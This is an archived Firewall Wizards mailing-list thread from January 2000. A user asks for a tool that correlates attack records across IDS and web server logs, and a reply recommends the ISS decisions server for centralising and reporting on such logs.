OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
NFR Wizards Archives: RE: Tools to correlate attacks b/w diff.

RE: Tools to correlate attacks b/w diff. logs

Subject: RE: Tools to correlate attacks b/w diff. logs
From: Shaun Moran (ShaunTheMorans.Com)
Date: Thu Jan 13 2000 - 08:18:24 CST

I'm pretty sure the ISS decisions server will corelate entries from multiple
sources including all ISS products (host/network IDS),
system/network/database scanners and CheckPoint Firewall-1 logs.

Sticks it all in an SQL database and generates reports/alarms from that.

Shaun

Who does'nt work for ISS - just uses their products.

-----Original Message-----
From: owner-firewall-wizardslists.nfr.net
[mailto:owner-firewall-wizardslists.nfr.net]On Behalf Of Pete Storm
Sent: Wednesday, 12 January 2000 6:18 AM
To: firewall-wizardsnfr.net
Subject: Tools to correlate attacks b/w diff. logs

Hi all,

Does anyone know of a tool out there that will allow
me to correlate incidents between several different
logs? For example, if I see an attempt to pull off a
php exploit on my IDS it stands to reason that I'll
see a similar log entry on my web server. What I'm
looking for is something that will pull these two
records out of the individual logs and place them in
an "incident" log as a related event.

The current problem is that we're talking about
hundreds of thousands of log entries. Suppose I could
Perl it, but I was kinda hoping there might be a
commercial/shareware tool out there already that could
do it so much better than I could.

thanks,
phs
__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com

This archive was generated by hypermail 2b27 : Fri Jan 14 2000 - 04:05:28 CST